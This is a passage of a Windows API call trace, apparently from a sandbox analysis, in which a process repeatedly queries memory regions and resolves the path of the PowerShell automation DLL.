	[0040.297] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.297] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.298] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.298] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.298] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.299] VirtualQuery (in: lpAddress=0x25ceec, lpBuffer=0x25deec, dwLength=0x1c | out: lpBuffer=0x25deec*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.299] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.300] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.300] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.300] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.300] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8f7c5b34, Data2=0xa3cb, Data3=0x4edc, Data4=([0]=0x97, [1]=0xa0, [2]=0x4a, [3]=0xa6, [4]=0x92, [5]=0x9d, [6]=0xe, [7]=0x8c))) returned 0x0
	[0040.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.300] GetLastError () returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.301] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xc62fa4e, Data2=0x6650, Data3=0x4119, Data4=([0]=0x8f, [1]=0xd9, [2]=0xd2, [3]=0xb0, [4]=0x5b, [5]=0xc, [6]=0x22, [7]=0x2f))) returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.301] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.302] GetLastError () returned 0x0
	[0040.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.303] GetLastError () returned 0x0
	[0040.304] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.304] GetLastError () returned 0x0
	[0040.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.304] GetLastError () returned 0x0
	[0040.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.304] GetLastError () returned 0x0
	[0040.304] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.304] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.305] GetLastError () returned 0x0
	[0040.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.305] GetLastError () returned 0x0
	[0040.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.305] GetLastError () returned 0x0
	[0040.305] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.305] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.305] GetLastError () returned 0x0
	[0040.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.305] GetLastError () returned 0x0
	[0040.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.305] GetLastError () returned 0x0
	[0040.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.306] GetLastError () returned 0x0
	[0040.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.306] GetLastError () returned 0x0
	[0040.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.306] GetLastError () returned 0x0
	[0040.306] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.306] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.306] GetLastError () returned 0x0
	[0040.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.307] GetLastError () returned 0x0
	[0040.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.307] GetLastError () returned 0x0
	[0040.307] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.307] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.307] GetLastError () returned 0x0
	[0040.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.307] GetLastError () returned 0x0
	[0040.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.307] GetLastError () returned 0x0
	[0040.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.308] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
